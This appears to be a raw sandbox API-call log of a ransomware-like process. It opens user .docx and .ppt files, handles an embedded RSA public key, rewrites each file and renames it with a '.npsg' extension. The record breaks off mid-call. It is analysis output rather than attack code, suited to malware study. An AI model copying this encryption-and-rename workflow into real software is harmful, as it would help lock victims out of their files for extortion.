[0236.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Id-3qUuhoEJj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\id-3quuhoejj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.682] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=81936) returned 1 [0236.682] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.685] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13fea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.685] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.687] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.687] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14010, lpOverlapped=0x0) returned 1 [0236.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.689] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.690] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.690] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.690] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.690] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.690] GetLastError () returned 0x0 [0236.690] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.690] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.690] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.690] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.690] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14010) returned 0x3b95d50 [0236.691] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95668 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400260 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b956b0 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400278 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002a8 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002c0 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.692] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002a8 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002c0 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34002a8 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002a8 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.693] GetCurrentThreadId () returned 0x5b4 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79198 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.693] GetCurrentThreadId () returned 0x5b4 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.694] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.694] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.695] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.695] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.695] CloseHandle (hObject=0x644) returned 1 [0236.696] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Id-3qUuhoEJj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\id-3quuhoejj.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Id-3qUuhoEJj.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\id-3quuhoejj.docx.npsg")) returned 1 [0236.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.697] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.698] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641f4d0, ftCreationTime.dwHighDateTime=0x1d5b770, ftLastAccessTime.dwLowDateTime=0xba821bc0, ftLastAccessTime.dwHighDateTime=0x1d5c149, ftLastWriteTime.dwLowDateTime=0xba821bc0, ftLastWriteTime.dwHighDateTime=0x1d5c149, nFileSizeHigh=0x0, nFileSizeLow=0x11d7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2nriryO.ppt", cAlternateFileName="")) returned 1 [0236.698] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j2nriryO.ppt") returned=".ppt" [0236.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j2nriryO.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j2nriryo.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.700] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=73087) returned 1 [0236.700] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.702] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x11d59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.702] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.704] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.704] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x11d7f, lpOverlapped=0x0) returned 1 [0236.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.705] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.706] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.706] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.706] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.706] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.706] GetLastError () returned 0x0 [0236.706] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.706] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.706] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.706] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.706] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11d80) returned 0x3b95d50 [0236.707] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b956b0 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400278 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b956f8 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400290 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002c0 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002d8 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.707] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002d8 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34002c0 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 